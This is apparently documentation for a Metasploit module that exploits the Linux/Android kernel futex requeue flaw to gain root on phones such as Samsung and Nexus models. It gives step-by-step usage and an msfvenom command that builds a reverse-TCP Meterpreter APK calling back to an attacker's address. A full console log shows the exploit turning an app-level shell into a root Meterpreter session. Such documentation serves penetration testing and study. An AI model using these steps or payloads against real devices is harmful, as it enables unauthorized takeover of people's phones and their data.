## Vulnerable Application

This module exploits a Linux kernel vulnerability, which is also present in the Android kernel, in the `futex` system call (the futex requeue operation). It does not trip (set off) Samsung KNOX as of the time of writing. Failed exploitation attempts may reboot the device.

## Verification Steps

1. Start msfconsole
2. Get a shell on a vulnerable Android device
3. Do: `use exploit/android/local/futex_requeue`
4. Select an appropriate target
5. Do: `set lhost [IP]`
6. Do: `run`
7. You should get a root shell.

## Targets

**0 Automatic Targeting**

Attempt to automatically determine the target

**1 Default**

Nexus 4, 5, 7, etc.

**2 New Samsung**

Samsung S3, S4, S5, etc.

**3 Old Samsung**

Samsung Note 2, etc.

**4 Samsung Grand**

Samsung Grand, etc.

## Scenarios

### Samsung Galaxy S3 Verizon (SCH-I535 w/ Android 4.4.2, kernel 3.4.0)

The following was used to generate a Meterpreter Android application, which was then installed on the device:

```
msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
```

```
[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue
msf5 exploit(android/local/futex_requeue) > set session 1
session => 1
msf5 exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf5 exploit(android/local/futex_requeue) > check
[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(android/local/futex_requeue) > run

[*] Started reverse TCP handler on 111.111.1.111:4444
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```